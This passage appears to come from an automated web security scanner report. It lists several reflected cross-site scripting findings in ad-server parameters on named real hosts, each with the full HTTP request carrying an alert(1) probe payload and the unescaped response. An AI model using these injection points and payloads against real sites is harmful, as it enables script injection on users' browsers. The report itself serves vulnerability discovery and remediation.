The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84af9'-alert(1)-'86aaccb8509 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_010111;sz=728x90;ord=[timestamp]?&84af9'-alert(1)-'86aaccb8509=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp]?&84af9'-alert(1)-'86aaccb8509=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/cm.mtv/ent_010111 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f097'-alert(1)-'a07a6cc0580 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_010111;sz=728x90;ord=[timestamp]?3f097'-alert(1)-'a07a6cc0580 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp]?3f097'-alert(1)-'a07a6cc0580;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1284f"-alert(1)-"841d2a94644 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=1284f"-alert(1)-"841d2a94644 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7019
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 12:17:46 GMT
Expires: Mon, 13 Jun 2011 12:17:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
gEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=1284f"-alert(1)-"841d2a94644http://www.samsclub.com/sams/pagedetails/content.jsp?pageName=fathersDay_2011&pid=VML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83e2d"-alert(1)-"473a8a0b356 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA83e2d"-alert(1)-"473a8a0b356&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA83e2d"-alert(1)-"473a8a0b356&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fs
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3c0"-alert(1)-"9e76203f975 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342aa3c0"-alert(1)-"9e76203f975&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:44 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
UuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342aa3c0"-alert(1)-"9e76203f975&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7cc6"-alert(1)-"70134b5d168 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1a7cc6"-alert(1)-"70134b5d168&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1a7cc6"-alert(1)-"70134b5d168&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl =
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0c04"-alert(1)-"8bc6f69c449 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzwf0c04"-alert(1)-"8bc6f69c449&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzwf0c04"-alert(1)-"8bc6f69c449&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 742ff"-alert(1)-"6805e040324 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L742ff"-alert(1)-"6805e040324&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/189/%2a/p%3B242168662%3B0-0%3B0%3B64929697%3B3454-728/90%3B42471813/42489600/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L742ff"-alert(1)-"6805e040324&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfn
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52a5f"-alert(1)-"97ebfb0646b was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=52a5f"-alert(1)-"97ebfb0646b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
